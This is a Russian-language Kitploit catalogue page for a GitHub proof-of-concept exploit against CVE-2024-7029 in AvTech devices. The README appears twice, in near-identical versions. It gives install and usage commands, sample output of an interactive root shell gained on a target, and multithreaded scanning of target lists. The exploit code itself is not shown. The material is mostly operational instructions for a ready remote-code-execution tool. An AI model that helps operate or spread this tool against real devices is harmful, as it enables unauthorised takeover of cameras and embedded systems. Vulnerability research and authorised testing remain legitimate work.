Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7029 — PoC-эксплойт для уязвимости CVE-2024-7029, обнаруженной в устройствах AvTech, позволяющий удалённое выполнение кода (RCE). | Kitploit
Инструменты/GitHubGitHub/geniuszly/cve-2024-7029
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubgeniuszly/cve-2024-7029

CVE-2024-7029

PoC-эксплойт для уязвимости CVE-2024-7029, обнаруженной в устройствах AvTech, позволяющий удалённое выполнение кода (RCE).

Репозиторий
91 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

EN

GenAvTechRCEExploit — PoC-эксплоит для уязвимости CVE-2024-7029, обнаруженной в устройствах AvTech, позволяющий удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.

Возможности

  • Поиск уязвимостей: Проверка устройств AvTech на уязвимость к RCE.
  • Интерактивная оболочка: Выполнение команд на целевом устройстве через интерактивную оболочку.
  • Многопоточное сканирование: Одновременное сканирование нескольких целей с использованием многопоточности.
  • Выполнение полезной нагрузки: Эксплуатация целей путем отправки специально сформированных полезных нагрузок для удаленного выполнения команд.

Требования

  • Python 3.7+
  • библиотека requests
  • библиотека prompt_toolkit
  • библиотека alive_progress

Установите необходимые библиотеки с помощью:

root@kitploit:~
pip install -r requirements.txt

Использование

Сканирование одной цели

Для проверки одной цели на уязвимость и запуска интерактивной оболочки:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

Замените <target_url> на реальный URL целевого устройства.

Сканирование нескольких целей

Для сканирования нескольких целей, указанных в файле (один URL на строку):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

Замените <file_path> на путь к вашему файлу, содержащему URL-адреса целей.

Потоки

Вы можете указать количество потоков для сканирования с помощью опции -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

По умолчанию количество потоков установлено на 10.

Пример

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20

RU

GenAvTechRCEExploit - эксплоит для CVE-2024-7029 в устройствах AvTech, позволяющая удаленное выполнение кода (RCE). Этот инструмент может сканировать уязвимые устройства и выполнять на них команды в интерактивном режиме.

Возможности

  • Поиск уязвимостей: Проверка устройств AvTech на уязвимость к RCE.
  • Интерактивная оболочка: Выполнение команд на целевом устройстве через интерактивную оболочку.
  • Многопоточное сканирование: Одновременное сканирование нескольких целей с использованием многопоточности.
  • Выполнение полезной нагрузки: Эксплуатация целей путем отправки специально сформированной полезной нагрузки для удаленного выполнения команд.

Требования

  • Python 3.7+
  • Библиотека requests
  • Библиотека prompt_toolkit
  • Библиотека alive_progress

Установить необходимые библиотеки можно с помощью:

root@kitploit:~
pip install -r requirements.txt

Использование

Сканирование одной цели

Для проверки уязвимости одной цели и запуска интерактивной оболочки:

root@kitploit:~
python3 GenAvTechRCEExploit.py -u <target_url>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -u http://192.168.1.100

[*] Выполняется проверка уязвимости цели...
[+] Обнаружена уязвимость на цели: http://192.168.1.100
[*] Запуск интерактивной оболочки...
Shell> whoami
root
Shell> uname -a
Linux avtech-device 4.15.0-45-generic #48-Ubuntu SMP Fri Jan 18 08:54:43 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Shell> exit
[*] Завершение интерактивной оболочки

Замените <target_url> на реальный URL целевого устройства.

Сканирование нескольких целей

Для сканирования нескольких целей, указанных в файле (один URL на строку):

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path>
root@kitploit:~
$ python3 GenAvTechRCEExploit.py -f targets.txt

Scanning Targets |████████████████████████████████████████| 100% 
[+] Обнаружена уязвимость на цели: http://192.168.1.50
[+] Обнаружена уязвимость на цели: http://192.168.1.150
[-] Цель http://192.168.1.200 не уязвима

Замените <file_path> на путь к файлу, содержащему URL-адреса целей.

Потоки

Вы можете указать количество потоков для сканирования с помощью опции -t:

root@kitploit:~
python3 GenAvTechRCEExploit.py -f <file_path> -t <number_of_threads>

По умолчанию количество потоков установлено на 10.

Пример

root@kitploit:~
python3 GenAvTechRCEExploit.py -u http://192.168.1.1
python3 GenAvTechRCEExploit.py -f targets.txt -t 20
Скачать инструмент